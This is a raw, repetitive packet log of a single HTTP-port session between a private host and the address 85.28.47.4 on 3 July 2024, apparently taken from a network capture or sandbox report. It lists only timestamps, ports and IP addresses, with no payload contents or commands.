Jul 3, 2024 18:08:24.680671930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680681944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680692911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680702925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680712938 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.680747986 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.680800915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680813074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680823088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680833101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680852890 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.680871964 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.680881023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680892944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680902958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680912971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680922985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680929899 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.680932999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.680946112 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.680967093 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681144953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681154966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681164980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681180000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681190014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681197882 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681224108 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681279898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681292057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681303978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681315899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681327105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681329012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681350946 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681375027 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681405067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681416988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681456089 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681554079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681565046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681575060 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681585073 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681595087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681602955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681606054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681617975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681619883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681627989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681638956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681646109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681668997 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681682110 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681782007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681792974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681802988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681814909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681829929 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681860924 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681896925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681907892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681917906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681931019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681941986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.681945086 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681960106 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.681989908 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.682055950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.682065964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.682077885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.682111025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.682122946 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.751131058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.751153946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.751163960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.751256943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.751265049 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.751266956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.751277924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.751288891 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.751327991 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.751339912 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.751354933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.751367092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.751394987 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.751415968 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.751506090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.751517057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.751527071 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.751537085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.751548052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.751549959 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.751559019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.751564980 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.751645088 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.759645939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.759682894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.759697914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.759717941 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.759733915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.759741068 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.759747028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.759779930 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.759792089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.759798050 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.759833097 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.759836912 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.759848118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.759877920 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.763655901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.763748884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.763758898 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.763761044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.763772964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.763782978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.763792992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.763801098 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.763803959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.763814926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.763822079 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.763845921 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.763858080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.763916016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.763925076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.763935089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.763952017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.763962984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.763963938 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.763973951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.763986111 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.763993025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764007092 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764022112 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764169931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764180899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764190912 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764202118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764213085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764218092 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764223099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764235020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764246941 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764262915 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764292955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764302015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764348030 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764431000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764442921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764453888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764463902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764473915 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764476061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764491081 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764497995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764502048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764513016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764523983 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764544964 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764554977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764727116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764738083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764748096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764763117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764771938 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764775991 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764786005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764794111 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764797926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.764826059 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.764837027 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.769432068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769495010 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.769514084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769524097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769553900 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.769567013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769567966 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.769577980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769588947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769601107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769606113 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.769623995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.769634962 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.769665003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769706011 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.769777060 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769820929 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.769824028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769835949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769864082 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.769874096 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.769895077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769906044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769923925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769934893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769934893 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.769947052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.769958973 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.769980907 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770009995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770061970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770072937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770083904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770104885 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770138979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770160913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770176888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770188093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770198107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770200014 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770242929 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770379066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770395041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770406008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770421028 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770464897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770483017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770494938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770505905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770518064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770529032 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770529985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770572901 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770593882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770603895 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770606041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770617008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770637035 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770658016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770678043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770689011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770695925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770699978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770793915 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770804882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770817041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770828009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770838022 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770848036 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770879984 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.770920038 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770930052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770941019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.770963907 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.771018982 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.771054029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.771065950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.771075964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.771089077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.771102905 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.771131039 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.771286011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.771297932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.771308899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.771320105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.771327972 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.771330118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.771342039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.771352053 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.771354914 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.771362066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.771372080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.771383047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.771400928 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.771425962 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.839838028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.839870930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.839881897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.839958906 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.839982986 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.839999914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.840010881 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.840020895 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.840033054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.840043068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.840050936 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.840082884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.840112925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.840125084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.840136051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.840157032 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.840193033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.840220928 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.840233088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.840244055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.840269089 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.840274096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.840293884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.840327024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.848392963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.848438978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.848449945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.848510027 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.848515987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.848520994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.848526955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.848536968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.848572016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.848587990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.848848104 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.848893881 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.852062941 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852117062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.852139950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852152109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852190018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.852219105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852230072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852236032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852241039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852319956 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.852351904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852399111 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.852444887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852454901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852466106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852495909 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.852510929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852521896 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852528095 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.852555990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852556944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.852567911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852607012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.852683067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852694035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852704048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852715015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852725029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.852734089 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.852755070 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.852778912 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.852914095 CEST	80	49710	85.28.47.4	192.168.2.6
